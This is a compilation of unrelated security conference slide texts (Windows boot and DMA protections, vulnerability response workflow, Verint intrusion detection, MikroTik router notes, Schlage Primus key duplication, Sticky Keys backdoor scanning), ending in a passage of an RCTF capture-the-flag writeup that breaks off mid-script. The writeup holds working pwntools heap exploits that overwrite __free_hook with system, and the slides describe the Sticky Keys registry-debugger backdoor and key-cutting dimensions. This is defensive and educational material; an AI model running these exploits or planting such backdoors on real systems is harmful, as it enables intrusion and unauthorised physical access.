rooted MLE
Measured values:
Code integrity Policy
Hypervisor, kernel hashes
UEFI Vars
Etc…
Zero Trust
Measurements of key properties available in PCRs and TCG logs
Attest TCB components through System Guard runtime attestation + Microsoft
Conditional Access + WDATP
SMM Attacks
Can be used to tamper HV and SK post-MLE
SMM paging protections + attestation on roadmap
Improving Boot Security
Improving Boot Security
System Guard with DRTM
External researchers and OSR REDTEAM highlighted SMM risks for DRTM
and VBS
Arbitrary code execution in SMRAM can be used to defeat Hypervisor
Malicious code running in SMM is difficult to detect
Improving Boot Security
SMM vulnerabilities used in OSR
REDTEAM reported to Lenovo
Mitigating SMM exploitation
Intel Runtime BIOS resilience provides the following security
properties for SMM:
SMM entry point locked down
All code within SMM locked down
Memory map and page properties locked down
OS and HV memory not directly accessible from SMM
Protecting SMM
SMM Page
Table
SMI
Handler
SMM
BootCode/BootData
MMIO
SMRAM
Reserved
ACPINvs
RuntimeCode/RuntimeData
ACPI Reclaim
BootCode/BootData
LoaderCode/LoaderData
SMM Paging Audit
SMM Protection
Attackers with casual physical access
cannot modify data or code on the device.
Increasing Physical Attacks
LPC/SPI TPM VMK Key Extraction with Logic Analyzer
Sources: 1, 2, 3
Bitlocker Cold Boot Attacks
Sources: 1
DMA Attacks with PCILeech
Sources: 1, 2
Security Goals
Prevent ‘’evil cleaner’’ drive by physical attacks from
malicious DMA attacks
Design Details
Use IOMMU to block newly attached Thunderbolt™ 3
devices from using DMA until an user is logged in
UEFI can enable IOMMU an BME in early boot until Windows
boots (See Project Mu)
Automatically enable DMA remapping with compatible
device drivers
In future releases, we are looking to harden protection on all
external PCI ports and cross-silicon platforms
Windows DMA protection
Connect peripheral
New devices are
enumerated and
functioning
OS
User
Peripheral
Drivers opted-
in DMAr?
Yes
Enable DMAr for
the peripherals
No
User logged in
AND Screen
unlocked?
No
Wait for user
to login/
unlock
screen
Yes
Security Goals
Prevent ‘’evil cleaner’’ drive by physical attacks from
malicious DMA attacks
Design Details
Use IOMMU to block newly attached Thunderbolt™ 3
devices from using DMA until an user is logged in
Automatically enable DMA remapping with compatible
device drivers
In future releases, we are looking to harden protection on all
external PCI ports and cross-silicon platforms
Thunderclap Attack
Locked device
Encryption key is removed from memory
Encryption key is recomputed using user entropy
Windows Data Protection Under Lock
Per-file encryption provides a second layer of protection at rest
Key is derived from user secret (Hello, Biometric)
Unlocked device
Messages
Encrypted, key discarded upon lock
Passwords,
credit card
info
Health data
Documents
and photos
App1 Data
App2 Data
App3 Data
Encrypted, key discarded upon shutdown
App1
App2
App3
Unenlightened Apps
Messaging
Apps
Edge
Health
Mail,
Photos,
Documents,
etc.
Enlightened Apps
BitLocker protection
promise
User identities cannot be compromised,
spoofed, or stolen.
Windows Hello and NGC
Offers biometric authentication and hardware backed
key storage
PIN vulnerable to input attacks from malicious admin
Improving Identity Security
Future version of Windows include biometric hardening
enabled through virtualization
Biometric hardening of the data path using
virtualization
Hardening of credential release
Improving Identity Security
Sensor Adapter
Biometric Unit
Engine Adapter
Feature Extraction
Template Construction
Storage Adapter
Sensor
Driver
Windows Biometric Framework
Template DB
Spoofs
Replay
Leak/Inject
Replay
Leak/Inject
Modify
templates
Template
injection
Modify match
result
Add
unauthorized
templates
Inject match
event
Replay
Steal TPM
authblob
Windows Hello Attack Surface
Sensor
Driver
Template DB
Engine Adapter
Feature Extraction
Template Construction
Sensor Adapter
Storage Adapter
bioIso.exe
Secure Driver
Windows Hello Attack Surface
Sensor Adapter
Biometric Unit
Engine Adapter
Feature Extraction
Template Construction
Storage Adapter
Sensor
Driver
Template DB
Spoofs
Replay
Leak/Inject
Replay
Leak/Inject
Modify
templates
Template
injection
Modify match
result
Add
unauthorized
templates
Inject match
event
Replay
Steal TPM
authblob
Beyond Passwords
Violations of promises are observable.
Platform Tamper Detection for Windows
Spanning device boot to ongoing runtime process tampering
Designed for remote assessment of device health
Platform approach to benefit a variety of 3rd parties and scenarios
Hardware rooted device trust
Leverage the VBS security boundary to raise the bar on anti-tampering
Challenging to build tamper detection schemes on top of Windows
Extensible platform component that can be used via forthcoming public API
Tamper Evident Windows
1 2 3
Admin
EPROCESS
Driver Dispatch
Process Mitigations
VBOX
Capcom
CPU-Z
Attacker Process
Closing
Platform features rapidly changing
Windows is evolving quickly to increase protections against new
attacks
Aspirational goals to provide strong guarantees across a growing
threat model
Researchers and Community help us improve
Programs such as bug and mitigation bounty are critical
We want to work together with research communities in China
and beyond to learn more about current and future attacks
Windows needs the community | pdf |
漏洞响应的六思
如何在归档漏洞
如何运营漏洞
如何跟踪漏洞
如何在洞海茫茫中搜集漏洞
如何在漏洞中识别水洞
如何在漏洞响应阶段处理漏洞
61.42%
共收录1209个漏洞,其中:
高可利用性漏洞:238个
非高可利用的高危漏洞:267个
影响一般的中危漏洞:742个
影响很小的低危漏洞:66个
影响一般的中危漏洞
10.97%
22.12%
5.49%
影响很小的低危漏洞
非高可利用的高危漏洞
高可利用性漏洞
标准化的重要性
漏洞搜集
漏洞响应
漏洞运营
漏洞定级分发
漏洞跟踪
漏洞归档
自动化收集 + 人工筛选 = 录入平台
定级金字塔模型 + 漏洞专家培养方案
响应流程标准化
(漏洞预警+漏洞复现+漏洞检测+漏洞防御)
跟踪流程标准化
(补丁+用户+变形+原理+影响)
运营流程标准化
(效果 + 市场)
归档流程标准化
(分析报告+标准化漏洞格式)
如何在洞海茫茫中搜集漏洞
Hacker's5Blog
Hacker5Conference
InfoSec5News
Vulnerabilities/Exploits
Security5Teams
Security5Community
洞
Exploit-DB
PacketStorm-Exploits
SecurityFocus
Bugtraq
Full5Disclosure
Seebug漏洞社区
SCAP中文社区
.....
Google5Security
小黑屋
Web5Security5Blog5– Acunetix
安全弱点实验室
FireEye5Threat5Research5Blog
勾陈安全实验室
腾讯科恩实验室官方博客
seebug's5paper
HackerOne
.....
DEFCON
窝
离别歌-phith0n
ADog's5Blog
bsmali4的小窝
安全工搬砖笔记
独自等待-信息安全博客
sky's自留地
暗月|博客
0xCC
.....
先知安全技术社区,5吾爱破解,55i春秋社区,55看雪论坛,
T00LS,5BlackHat,5漏洞时代,5SRC,5知识星球 ,5...
FreeBuf
RoarTalk
MottoIN
91Ri.org,5SecWiki5News,
安全脉搏,5安全盒子,5...
如何在漏洞中识别水洞
公司预警
一级
千里目预警
三级
安全云预警
二级
平台收录
四级
漏洞危害程度
目标使用范围
攻击细节泄露
如何在漏洞响应阶段处理漏洞
IPS规则库
WAF规则库
漏洞防御
超融合架构
云端镜像仓库
漏洞复现
前言
千里百科
漏洞描述
漏洞复现
影响版本
修复建议
参考链接
深信服解决方案
漏洞预警
云眼平台插件
云镜平台插件
漏洞检测
插件标准化
插件在线编写 +5下发测试 +5部署上线
规则库标准化
规则在线编写 +5下发测试 +5部署上线
预警标准化模板
根据级别推送到不同接口人
Docker模板
云+端的漏洞靶场部署
如何跟踪漏洞
影响跟踪
原理跟踪
变形跟踪
用户跟踪
补丁跟踪
统计影响分布
漏洞原理分析文章
绕过补丁方案
收集变形攻击脚
本(其他检测方
案),更新云眼
平台插件。
收集变形绕过数
据包,更新AF库
受影响客户推送
跟踪漏洞补丁
如何运营漏洞
1
跟踪变形攻击
收集变形攻击脚本(其他检测
方案)
分析漏洞原理找出绕过补丁方
案
2
调整规则和插件的准确性
收集变形绕过数据包,更新AF
库
更新云眼平台插件
3
深入影响跟踪
设备+云平台联动形成大数据
平台,统计漏洞影响分布
如何归档漏洞
漏洞复盘
漏洞归档文件
漏洞报告
预警 +""分析 +"""数据 ="""报告
漏洞详细分析文档
漏洞环境操作文档
04
03
02
01
基于漏洞闭环的跟踪平台
后端
Flask
2012
前端
AngularJS+Bootstrap
2013
消息队列
RabbitMQ
2014
部署方式
wsgi+Supervisor+gunicorn+nginx
2015
漏洞闭环平台
漏洞库
规则库
插件库
镜像仓库
基于漏洞闭环的跟踪平台
流程图
LOREM
漏洞搜集
2012
LOREM
漏洞响应
2013
LOREM
漏洞跟踪
2014
LOREM
漏洞运营
2015
LOREM
漏洞归档
2016
基于漏洞闭环的跟踪平台基功能架构
漏洞闭环的跟踪平台->漏洞库
漏洞重要等级
爆发时间
CVE编号
SF编号
漏洞名称
CNVD
Bugtraq编号
分析人
类型
链接
状态
备注
微软漏洞编号
漏洞大类
漏洞对象
漏洞小类
漏洞描述
漏洞影响版本
漏洞解决方案
漏洞参考链接
漏洞详细分析
环境操作文档
插件编号
规则编号
Q&A | pdf |
Confidential and proprietary information of Verint Systems Inc. © All rights reserved worldwide
1
Changing the Mindset of Cyber Defense
Detecting the Intent, Not just the Technique
Vadim Pogulievsky
Director of Cyber Research, Verint
Confidential and proprietary information of Verint Systems Inc. © All rights reserved worldwide
2
About me
•
Vadim Pogulievsky
•
Director of Cyber Research at Verint
•
Building Cyber Security products for last 15 years
•
Previously led Cyber Security Research teams for Finjan, M86
Security and McAfee
Confidential and proprietary information of Verint Systems Inc. © All rights reserved worldwide
3
Confidential and proprietary information of Verint Systems Inc. © All rights reserved worldwide
3
Current industry state
Seeing a big picture
Can it be better?
What we should do as an
industry to improve it?
Agenda
Confidential and proprietary information of Verint Systems Inc. © All rights reserved worldwide
4
Confidential and proprietary information of Verint Systems Inc. © All rights reserved worldwide
5
“Hackers Attack Every 39 Seconds”
“One in Three Americans Hacked in the Past Year “
“Cyber crime damage costs to hit $6 trillion annually by 2021”
“Around one billion accounts and records were compromised worldwide in 2016 “
“Cyber crime will more than triple the number of unfilled cybersecurity jobs, which
is predicted to reach 3.5 million by 2021”
On the other hand..
Confidential and proprietary information of Verint Systems Inc. © All rights reserved worldwide
6
Confidential and proprietary information of Verint Systems Inc. © All rights reserved worldwide
6
So, why that’s the situation?
+ Because we compare instead of
cooperate
+ Because every single security product is
built in a way it’s the only product installed
in customer’s network
+ Because customer has to build a cyber
defense ecosystem from products that
weren’t built to be a part of an ecosystem
Confidential and proprietary information of Verint Systems Inc. © All rights reserved worldwide
7
High FP rate – Why it happens?
According to Cisco 2017 Security Capabilities
Benchmark Study:
“Organizations can investigate only
56 percent of the security alerts
they receive on a given day”
Confidential and proprietary information of Verint Systems Inc. © All rights reserved worldwide
8
To Alert or Not to Alert?
I see a suspicious JS, but can’t
analyze it properly..
So, will I miss a possible attack
or
Create possible false positive?
Dilemma…
PDF with Obfuscated JS
Confidential and proprietary information of Verint Systems Inc. © All rights reserved worldwide
9
Detecting malicious technique is not enough
Confidential and proprietary information of Verint Systems Inc. © All rights reserved worldwide
10
Seeing the entire picture – Is a Must!
Only this way you can understand the intent!
Confidential and proprietary information of Verint Systems Inc. © All rights reserved worldwide
11
What if it would work this way..
“Hey folks, found a fishy file
sending some traffic to
suspicious domain. Anyone
can take a look?”
“Hi there, scanned it.
Don’t worry, it’s benign, on
my whitelist”
Confidential and proprietary information of Verint Systems Inc. © All rights reserved worldwide
12
Seeing all together is an utopia?
Interactive Conversation instead on One way Street
-
Ability to answer questions vs triggering alerts
Automatic Investigation
- Investigation of every single lead is too much for human
Confidential and proprietary information of Verint Systems Inc. © All rights reserved worldwide
13
First Steps to this direction
Security Automation and Orchestration
-
Automating some time and effort
consuming tasks
-
Enriching data with internal and
external sources
Good start, but not enough!
Let’s look further !
Confidential and proprietary information of Verint Systems Inc. © All rights reserved worldwide
14
False Positive investigation
EXE
EXE
C&C alert
Whois
Confidential and proprietary information of Verint Systems Inc. © All rights reserved worldwide
15
True Positive investigation
EXE
C&C alert
Whois
EXE
EXE
Confidential and proprietary information of Verint Systems Inc. © All rights reserved worldwide
16
Building an integrated cyber security ecosystem
Detection
One lead for an attack
should be enough
Forensics data
Collecting in advance for
future investigations
Response
Response in a best
appropriate way
Investigation Engine
Run the investigation process
and make decisions
Confidential and proprietary information of Verint Systems Inc. © All rights reserved worldwide
17
Confidential and proprietary information of Verint Systems Inc. © All rights reserved worldwide
17
Summary
Ecosystem
instead of silo
products
Automation as a
central
investigation
platform
Every alert is
investigated
Relevant
forensics data is
available for
investigations
Confidential and proprietary information of Verint Systems Inc. © All rights reserved worldwide
18
Thank You! | pdf |
●
●
●
●
○
○
○
●
MikroTik Complete Solution for ISP
●
Building and Running a Successful WISP
●
MikroTik in Real Life, Full and Low Budget ISP
●
X2com and MikroTik: New Core Network Case Study
●
How to Build an ISP Business with Mikrotik Only
●
Basic Mistakes by ISP's on Network Setup & BGP
●
ISP Design – Using MikroTik CHR as a BGP Edge
Router
●
Providing TriplePlay Services (Internet, VoIP, IPTV)
For Small Towns Using Wi-Fi Directional Radio
Channels
●
Security Challenges for ISPs and WISPs
●
○
○
○
■
■
■
●
○
○
○
○
●
○
○
○
●
○
○
○
○
○
○
809f93cbcfe5e45fae5d69ca7e64209c02647660d1a79b52ec6d05071b21f
7ff2e167370e3458522eaa7b0fb81fe21cd7b9dec1c74e7fb668e92e2610
81368d8f30a8b2247d5b1f8974328e9bd491b574285c2f132108a542ea7d3
b301d6f2ba8e532b6e219f3d9608a56d643b8f289cfe96d61ab898b4eab0e
99e1db762ff5645050cea4a95dc03eac0db2ceb3e77d8f17b57cd6e294404
76bf646fce8ff9be94d48aad521a483ee49e1cb53cfd5021bb8b933d2c4a7
e009b567516b20ef876da6ef4158fad40275a960c1efd24c804883ae2735
7c06b032242abefe2442a8d716dddb216ec44ed2d6ce1a60e97d30dbba1fb
f8080b9bfc1bd829dce94697998a6c98e4eb6c9848b02ec10555279221dd
4e350d11b606a7e0f5e88270938f938b6d2f0cc8d62a1fdd709f4a3f1fa2c
f1cf895d29970c5229b6a640c253b9f306185d4e99f4eac83b7ba1a325ef
8395e650e94b155bbf4309f777b70fa8fdc44649f3ab335c1dfdfeb0cdee4
a249a69e692fff9992136914737621f117a7d8d4add6bac5443c002c379fe
5e75b8b5ebbef78f35b00702ced557cf0f30f68ee08b399fc26a3e3367bb
fe022403a9d4c899d8d0cb7082679ba608b69091a016e08ad9e750186b194
116d584de3673994e716e86fbb3945e0c6102bfbd30c48b13872a808091e
4263c93ce53d7f88c62fecb6a948d70e51c19e1049e07df2c70a467bcefee
5d70 7dd5872
0d7d0f7015 11400 891 939549 01922bff2bb 3b7d5d
●
●
●
●
…
○
○
●
○
○
○
○
○
○
○
●
○
■
●
○
●
○
■
○
■
○
■
○
■
■
■
●
●
●
●
●
○
○
○
○
■
●
●
●
●
●
●
●
●
●
○
○
●
○
○
○
○
●
●
○
○
●
○
○
●
●
●
●
●
○
○
●
○
○
○
○
●
○
○
●
●
●
●
●
●
○
○
●
○
○
○
○
●
○
○
○
■
■
●
…
●
●
●
●
●
●
●
●
●
●
●
○
○
●
○
●
○
●
●
○
●
●
○
○
○
●
○
○
■
■
○
○
○
●
○
○
■
○
○
○
■
●
○
■
●
■
○
■
■
●
●
●
○
●
●
●
●
●
●
●
○
echo “lol” > /var/pdb/system/image
○
reboot
●
○
○
○
○
●
○
●
○
○
●
○
○
○
●
○
●
○
○
○
■
■
■
○
○
…
●
●
○
●
●
●
●
○
●
○
○
■
■
●
○
○
■
○
■
○
○
●
●
●
●
●
● | pdf |
Key Decoding and Duplication Attacks for the
Schlage Primus High-Security Lock
David Lawrence
Robert Johnson
Gabriel Karpman
[email protected]
DEF CON 21
August 3, 2013
dlaw, robj, gdkar (DEF CON 21)
Attacking the Schlage Primus
August 3, 2013
1 / 30
Standard pin-tumbler locks
Photo credit: user pbroks13 on Wikimedia Commons. Licensed under GFDL or CC-BY-SA-3.0.
Vulnerabilities
1 Key duplication: get copies made in any hardware store.
2 Manipulation: susceptible to picking, impressioning, etc.
dlaw, robj, gdkar (DEF CON 21)
Attacking the Schlage Primus
August 3, 2013
2 / 30
The Schlage Primus
Based on a pin-tumbler lock, but with a second independent locking
mechanism.
Manipulation is possible but extremely difficult. Some people can pick
these in under a minute. Most people cannot.
We will focus on key duplication and the implications thereof.
dlaw, robj, gdkar (DEF CON 21)
Attacking the Schlage Primus
August 3, 2013
3 / 30
1
Reverse-engineering the Primus
2
3D modeling Primus keys
3
Fabricating Primus keys
4
What it all means
dlaw, robj, gdkar (DEF CON 21)
Attacking the Schlage Primus
August 3, 2013
4 / 30
1
Reverse-engineering the Primus
2
3D modeling Primus keys
3
Fabricating Primus keys
4
What it all means
dlaw, robj, gdkar (DEF CON 21)
Attacking the Schlage Primus
August 3, 2013
5 / 30
Security through patents
dlaw, robj, gdkar (DEF CON 21)
Attacking the Schlage Primus
August 3, 2013
6 / 30
Look up the patent. . .
dlaw, robj, gdkar (DEF CON 21)
Attacking the Schlage Primus
August 3, 2013
7 / 30
Primus service manual
w3.securitytechnologies.com/IRSTDocs/Manual/108482.pdf
(and many other online sources)
dlaw, robj, gdkar (DEF CON 21)
Attacking the Schlage Primus
August 3, 2013
8 / 30
Sidebar operation
DO N O T DU P L I C A T E
P AT .NO .4,756,177
PRIMUS
Finger pins must be lifted to the correct height.
Finger pins must be rotated to the correct angle.
dlaw, robj, gdkar (DEF CON 21)
Attacking the Schlage Primus
August 3, 2013
9 / 30
Disassembly
Fill in any missing details by obtaining a lock and taking it apart.
Photo credit: user datagram on lockwiki.com. Licensed under CC-BY-3.0.
dlaw, robj, gdkar (DEF CON 21)
Attacking the Schlage Primus
August 3, 2013
10 / 30
1
Reverse-engineering the Primus
2
3D modeling Primus keys
3
Fabricating Primus keys
4
What it all means
dlaw, robj, gdkar (DEF CON 21)
Attacking the Schlage Primus
August 3, 2013
11 / 30
Top bitting specifications
MACS = 7
.031"
1.012"
100°
.8558"
.6996"
.5434"
.3872"
.231"
1
2
3
4
5
6
0
.335”
1
.320”
2
.305”
3
.290”
4
.275”
5
.260”
6
.245”
7
.230”
8
.215”
9
.200”
Increment:
Progression:
Blade Width:
Depth Tolerance:
Spacing Tolerance:
.015”
Two Step
.343”
+.002”-0”
±.001”
dlaw, robj, gdkar (DEF CON 21)
Attacking the Schlage Primus
August 3, 2013
12 / 30
Side bitting specifications
Schlage doesn’t publish exact dimensions for the side bitting.
Scan 10 keys on flatbed scanner, 1200 dpi, and extract parameters.
Index
Position
Height from bottom
Horizontal offset
1
Shallow left
0.048 inches
0.032 inches left
2
Deep left
0.024 inches
0.032 inches left
3
Shallow center
0.060 inches
None
4
Deep center
0.036 inches
None
5
Shallow right
0.048 inches
0.032 inches right
6
Deep right
0.024 inches
0.032 inches right
dlaw, robj, gdkar (DEF CON 21)
Attacking the Schlage Primus
August 3, 2013
13 / 30
Modeling the side bitting
Design requirements
1 Minimum slope: finger pin must settle to the bottom of its valley.
2 Maximum slope: key must go in and out smoothly.
3 Radiused bottom: matches the radius of a finger pin.
dlaw, robj, gdkar (DEF CON 21)
Attacking the Schlage Primus
August 3, 2013
14 / 30
Key cross-section
One shape fits in all Primus locks.
Dictated by physical constraints: the pins (and therefore the control
surfaces) are always in the same place relative to the cylinder housing.
CP
P
R
I
M
U
S
HP
CEP
P
R
I
M
U
S
J P
EFP
P
R
I
M
U
S
FP
P
R
I
M
U
S
FGP
P
R
I
M
U
S
EP
P
R
I
M
U
S
LP
dlaw, robj, gdkar (DEF CON 21)
Attacking the Schlage Primus
August 3, 2013
15 / 30
Modeling the key in OpenSCAD
Programming language that compiles to 3D models.
First use to model keys was by Nirav Patel in 2011.
Full implementation of Primus key is a few hundred lines of code.
// top_code is a list of 6 integers.
// side_code is a list of 5 integers.
// If control = true, a LFIC removal key will be created.
module key(top_code, side_code, control = false) {
bow();
difference() {
envelope();
bitting(top_code, control);
sidebar(side_code);
}
}
dlaw, robj, gdkar (DEF CON 21)
Attacking the Schlage Primus
August 3, 2013
16 / 30
The result
key([4,9,5,8,8,7], [6,2,3,6,6]);
dlaw, robj, gdkar (DEF CON 21)
Attacking the Schlage Primus
August 3, 2013
17 / 30
1
Reverse-engineering the Primus
2
3D modeling Primus keys
3
Fabricating Primus keys
4
What it all means
dlaw, robj, gdkar (DEF CON 21)
Attacking the Schlage Primus
August 3, 2013
18 / 30
Hand machining
Materials needed:
Hardware store key blank ($1)
Dremel-type rotary tool ($80)
Calipers ($20)
Cut, measure, and repeat ad nauseum.
Rob can crank one out in less than an hour.
dlaw, robj, gdkar (DEF CON 21)
Attacking the Schlage Primus
August 3, 2013
19 / 30
dlaw, robj, gdkar (DEF CON 21)
Attacking the Schlage Primus
August 3, 2013
20 / 30
dlaw, robj, gdkar (DEF CON 21)
Attacking the Schlage Primus
August 3, 2013
21 / 30
dlaw, robj, gdkar (DEF CON 21)
Attacking the Schlage Primus
August 3, 2013
22 / 30
dlaw, robj, gdkar (DEF CON 21)
Attacking the Schlage Primus
August 3, 2013
23 / 30
Computer-controlled milling
This is what the Schlage factory does.
High setup cost (hundreds of dollars): not practical for outsourced
one-off jobs.
Keep an eye on low-cost precision micromills.
dlaw, robj, gdkar (DEF CON 21)
Attacking the Schlage Primus
August 3, 2013
24 / 30
3D printing
This is the game changing technology.
(From bottom to top, picture shows low resolution plastic, high resolution
plastic, and titanium.)
dlaw, robj, gdkar (DEF CON 21)
Attacking the Schlage Primus
August 3, 2013
25 / 30
3D printing results
Working keys out of standard plastic (Shapeways “White Strong and
Flexible”), high-resolution plastic (Shapeways “Frosted Ultra Detail”),
and titanium (from i.materialise) on the first try.
Plastic keys cost $1 to $5. Some strength issues, but workable.
Titanium keys cost $100 and outperform genuine Schlage keys.
Sufficient resolution from all processes.
Over the next few years, expect to see prices decrease further.
dlaw, robj, gdkar (DEF CON 21)
Attacking the Schlage Primus
August 3, 2013
26 / 30
1
Reverse-engineering the Primus
2
3D modeling Primus keys
3
Fabricating Primus keys
4
What it all means
dlaw, robj, gdkar (DEF CON 21)
Attacking the Schlage Primus
August 3, 2013
27 / 30
Results
Key decoding is easy: now that we know the dimensions, all you
need is a high-resolution photo of a key.
Key duplication is easy: takes $10 and the contents of this talk.
Master key extrapolation is easy: the sidebar is not mastered, so
cracking a Primus system is just like cracking a standard pin-tumbler
system.
Keyless manipulation is still hard: need to start with at least a
photo of a key (or else disassemble a lock).
Our recommendations
Primus should not be used for high-security applications.
Existing Primus installations should reevaluate their security needs.
dlaw, robj, gdkar (DEF CON 21)
Attacking the Schlage Primus
August 3, 2013
28 / 30
Implications
The modeling/printing pipeline translates physical security into
information security.
Patent protection defends against physical reproduction, but does
nothing about the electronic distribution of 3D models.
Once a class of keys has been 3D modeled, there is much more power
in the hands of unskilled attackers.
dlaw, robj, gdkar (DEF CON 21)
Attacking the Schlage Primus
August 3, 2013
29 / 30
Future work
Combine the 3D modeling software with existing image-to-key decoding
software and 3D printing services. We envision a one click process: put in
a picture that you’ve snapped of a key and your credit card number, and
get the 3D printed key in the mail a week later.
New York City “master keys” debacle: how long until 3D models become
available? What will happen then?
dlaw, robj, gdkar (DEF CON 21)
Attacking the Schlage Primus
August 3, 2013
30 / 30 | pdf |
Sticky Keys to the
Kingdom
PRE-AUTH SYSTEM RCE ON WINDOWS IS MORE COMMON
THAN YOU THINK
DENNIS MALDONADO & TIM MCGUFFIN
LARES
Agenda
• About Us
• Problem Background
• Our Solution
• Statistics
• Prevention / Remediation
• Summary
www.lares.com
About Us
• Dennis Maldonado
• Adversarial Engineer – LARES Consulting
• Founder
• Houston Locksport
• Houston Area Hackers Anonymous (HAHA)
• Tim McGuffin
• Red Team Manager – LARES Consulting
• 10-year DEFCON Goon
• DEFCON CTF Participant
• Former CCDC Team Coach
www.lares.com
Windows Accessibility Tools
Binary
Description
How to access
C:\Windows\System32\Utilman.exe
Utility Manager
Windows Key + U
C:\Windows\System32\sethc.exe
Accessibility shortcut keys
Shift 5 times
C:\Windows\System32\osk.exe
On-Screen Keyboard
Locate the option on the screen using the
mouse
C:\Windows\System32\Magnify.exe
Magnifier
Windows Key + [Equal Sign]
C:\Windows\System32\Narrator.exe
Narrator
Windows Key + Enter
C:\Windows\System32\DisplaySwitch.exe
Display Switcher
Windows Key + P
C:\Windows\System32\AtBroker.exe
Manages switching of apps between
desktops
Have osk.exe, Magnify.exe,
or Narrator.exe open then lock the
computer. AtBroker.exe will be executed
upon locking and unlocking
History
• “How to Reset Windows Passwords” websites
• Replace sethc.exe or utilman.exe with cmd.exe
• Reboot, Press Shift 5x or WIN+U
• net user (username) (password)
• Login!
• Nobody ever cleans up after themselves
• Can be used as a backdoor/persistence method
• No Windows Event Logs are generated when backdoor is executed
Implementation
• Binary Replacement
• Replace any of the accessibility tool binaries
• Requires elevated rights
• May require taking ownership of files
• Registry (Debugger Method)
• HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution
Options\sethc.exe
• Debugger REG_SZ C:\Windows\System32\cmd.exe
• Requires elevated rights
Limitations
• Elevated access or offline system required
• Replacing binary must be Digitally Signed
• Replacing binary must exist in \System32\
• Replacing binary must exist in Windows “Protected File” list
• You can’t use any old Binary, but you can cmd.exe /c file.bat
Background
• While working with an Incident Response Team:
• Uncovered dozens of vulnerable servers and workstations via file checks
• Identification was done from the filesystem side
• Missed the Debugger Method
• Missed any unmanaged boxes
• Needed a network-based scanner
Background
• We wanted to write out own network-based tool
• Started down the JavaRDP Path
• Ran across @ztgrace’s PoC script, Sticky Keys Hunter
• It worked, and was a great starting point
• Similar to “Peeping Tom”
• Opens a Remote Desktop connection
• Sends keyboard presses
• Saves screenshot to a file
• Needed bug fixes, additional checks, had a TODO list, but not actively developed
Our Solution
• Automated Command Prompt Detection
• Parallelized scanning of multiple hosts
• Tons of bug fixes
• Error Handling
• Dynamic Timing
• Requires imagemagick, xdotool, bc, parallel
• All packages exist in the Kali repositories
DEMO
Solution - Limitations
• Ties up a Linux VM while scanning
• Needed for window focus and screenshotting
• Will not catch binaries that are replaced with anything other than
cmd.exe
• You get to scroll through screenshots!
• Ran across taskmgr.exe, mmc.exe, other custom applications
Statistics
• On a large Business ISP:
• Over 100,000 boxes scanned
• About 571 Command Prompts (every 1 out of 175)
• All types of Institutions
• Educational Institutions
• Law Offices
• Manufacturing Facilities
• Gaming companies
• Etc…
Recommendations
• Remediation
• Delete or replace the effected file (sethc.exe, utilman.exe, …)
• sfc.exe /scannnow
• Remove the affected registry entry
• Prevention and Detection
• Network Level Authentication for Remote Desktop Connection
• Restrict local administrative access
• Enable FDE and protect the key
• End point monitoring
Summary
• Multi-threaded scanner for binary replacement
backdoor with command prompt detection
• TODO:
• Code Cleanup
• Read in nmap output
• Code will be on Github
www.lares.com
Questions?
www.lares.com | pdf |
RCTF WriteUp By Nu1L
Author:Nu1L
RCTF WriteUp By Nu1L
Pwn
Pokemon
game
sharing
musl
ezheap
catch_the_frog
unistruct
warmnote
Web
ns_shaft_sql
CandyShop
VerySafe
hiphop
Easyphp
xss it?
EasySQLi
Reverse
sakuretsu
Program Logic:
Reverse Engineering Techniques Used:
Solving:
LoongArch
Valgrind
Hi!Harmony!
dht
two_shortest
Crypto
Uncommon Factors I
Uncommon Factors II
BlockChain
EasyFJump
HackChain
Misc
ezshell
monopoly
checkin
coolcat
welcome_to_rctf
FeedBack
Pwn
Pwn
Pokemon
给可达鸭讲话时存在溢出
溢出改下⼀个chunk的size,利⽤password来leak,之后改指针来改free_hook
from pwn import *
import fuckpy3
context.log_level = 'debug'
# p = process("./Pokemon")
p = remote('123.60.25.24', 8888)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
def launch_gdb():
print(pidof(p))
input()
def xor_str(a,b):
res = ''
for i in range(len(a)):
res += chr(a[i] ^ b[i%8])
return res.bytes()
def add(type,s=0,idx = 0):
p.sendlineafter(":","1")
p.sendlineafter(":",str(type))
if s != 0:
p.sendlineafter("?",str(s))
p.sendlineafter("]",str(idx))
def dele(i,need = False):
p.sendlineafter(":","2")
p.sendlineafter("[0/1]",str(i))
p.sendlineafter("Choice:","1")
if need:
p.sendlineafter(']','Y')
p.sendlineafter(":","aaaaa")
# talk
# p.sendlineafter(":","2")
# p.sendlineafter("]","0")
# p.sendlineafter(":","3")
# for i in range(17):
# p.send(p64(0xdeadbeef) * 2)
for i in range(7):
add(1,0x220)
dele(0)
add(1,0x300)
dele(0)
add(1,0x310)
dele(0)
add(1,0x220)
add(1,0x300,1)
dele(0)
add(1,0x300,0)
for i in range(5):
add(1,0x300,1)
dele(0)
add(2)
p.sendlineafter(":","2")
p.sendlineafter("]","0")
p.sendlineafter(":","3")
for i in range(16):
p.send(p64(0xdeadbeef) * 2)
p.send(p64(0) + p64(4704 + 1))
dele(0,True)
dele(1)
# 01AE9
add(1,0x300)
add(1,0x300,1)
dele(1)
p.sendlineafter(":","3")
p.sendlineafter("]","1")
add(1,0x310,1)
p.sendlineafter(":","3")
p.recvuntil('gem: ')
leak = u64(p.recv(6) + b'\x00\x00') - 2014176
log.info('leak ' + hex(leak))
p.sendlineafter("]","N")
dele(1)
add(1,0x300,0)
add(3,idx=1)
game
⼩怪那⾥有个奇怪的uaf,预先填好⼀个Libc的地址可以leak
p.sendlineafter(":","2")
p.sendlineafter("]","1")
p.sendlineafter(":","3")
p.sendline(p8(0xaa)*8 + p64(leak + libc.symbols['__free_hook'] - 3 ))
p.sendlineafter(":","3")
p.sendlineafter("]","Y")
p.recvuntil('password:')
p.send(xor_str(b'sh\x00' + p64(leak + libc.symbols['system']),p8(0xaa)*8 ))
dele(0)
p.interactive()
from pwn import *
import re
import fuckpy3
context.log_level = 'debug'
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# p = process('./game')
p = remote('123.60.25.24', 20000)
def launch_gdb():
# print(pidof(p))
input()
def send_data(s):
p.sendafter('talk to the dragon?',s)
def heal():
return p8(2) + p8(1)
def attack():
return p8(2) + p8(2)
def malloc(s):
return p8(17) + p8(1) + p8(s)
def calloc(s):
return p8(17) + p8(2) + p8(s)
def free():
return p8(18)
def jg(i1,i2):
return p8(8) + p8(i1) + p8(i2)
def add(i1,i2):
return p8(16) + p8(i1) + p8(i2)
def clear_bit(bit,value = 0,idx=0):
return p8(13) + p8(idx) + p8(bit) + p8(value)
def padding():
